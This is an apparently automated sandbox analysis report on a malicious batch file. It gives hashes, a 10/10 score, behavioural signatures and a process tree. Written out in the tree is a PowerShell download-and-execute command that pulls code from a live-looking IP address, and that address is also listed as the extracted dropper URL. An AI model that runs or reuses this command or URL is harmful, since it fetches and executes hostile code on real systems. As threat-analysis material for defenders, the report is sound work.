Analysis
- max time kernel: 136s
- max time network: 98s
- platform: windows10_x64
- resource: win10v200430
- submitted: 10-07-2020 20:10
Static task
- static1

Behavioral task
- behavioral1
- Sample: 2211aeb68404653c6a42054308cf95e6.bat
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task
- behavioral2
- Sample: 2211aeb68404653c6a42054308cf95e6.bat
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: 2211aeb68404653c6a42054308cf95e6.bat
- Size: 219B
- MD5: 68b33bb8cfe6e6cfbc8be50a90b3084b
- SHA1: 8b32c94506fe4bc67c38f6c1dbb955603dbc2ba4
- SHA256: 2311d76b97db37109d14a91f693f468810b9e530aa7f6a9d75dc827757054d6a
- SHA512: 6a328a1dc19ccddef2bb9aeb38fe874646b7789083360bb026435cb799e93b5a578713a53b45bb52a1f75327bc763054ebf2d2c53d2657dd20d88f89f8f84928
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/2211aeb68404653c6a42054308cf95e6
Signatures
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes (description | pid | process | target process):
    PID 2804 wrote to memory of 992 | 2804 | cmd.exe | powershell.exe
    (the same event is recorded 3 times)
- Program crash (1 IoC)
  Processes (pid | pid_target | process | target process):
    1800 | 992 | WerFault.exe | powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (description | pid | process):
    Token: SeRestorePrivilege | 1800 | WerFault.exe
    Token: SeBackupPrivilege | 1800 | WerFault.exe
    Token: SeDebugPrivilege | 1800 | WerFault.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes (pid | process):
    1800 | WerFault.exe (recorded 14 times)
Processes
- C:\Windows\system32\cmd.exe (PID 2804)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2211aeb68404653c6a42054308cf95e6.bat"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 992)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/2211aeb68404653c6a42054308cf95e6');Invoke-LJICDRBAHEGJ;Start-Sleep -s 10000"
    - C:\Windows\SysWOW64\WerFault.exe (PID 1800)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 704
      Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Downloads
- memory/992-0-0x0000000000000000-mapping.dmp
- memory/992-2-0x0000000000000000-mapping.dmp
- memory/992-3-0x0000000000000000-mapping.dmp
- memory/992-5-0x0000000000000000-mapping.dmp
- memory/992-4-0x0000000000000000-mapping.dmp
- memory/992-6-0x0000000000000000-mapping.dmp
- memory/992-7-0x0000000000000000-mapping.dmp
- memory/1800-1-0x00000000050A0000-0x00000000050A1000-memory.dmp (Filesize: 4KB)
- memory/1800-8-0x00000000056D0000-0x00000000056D1000-memory.dmp (Filesize: 4KB)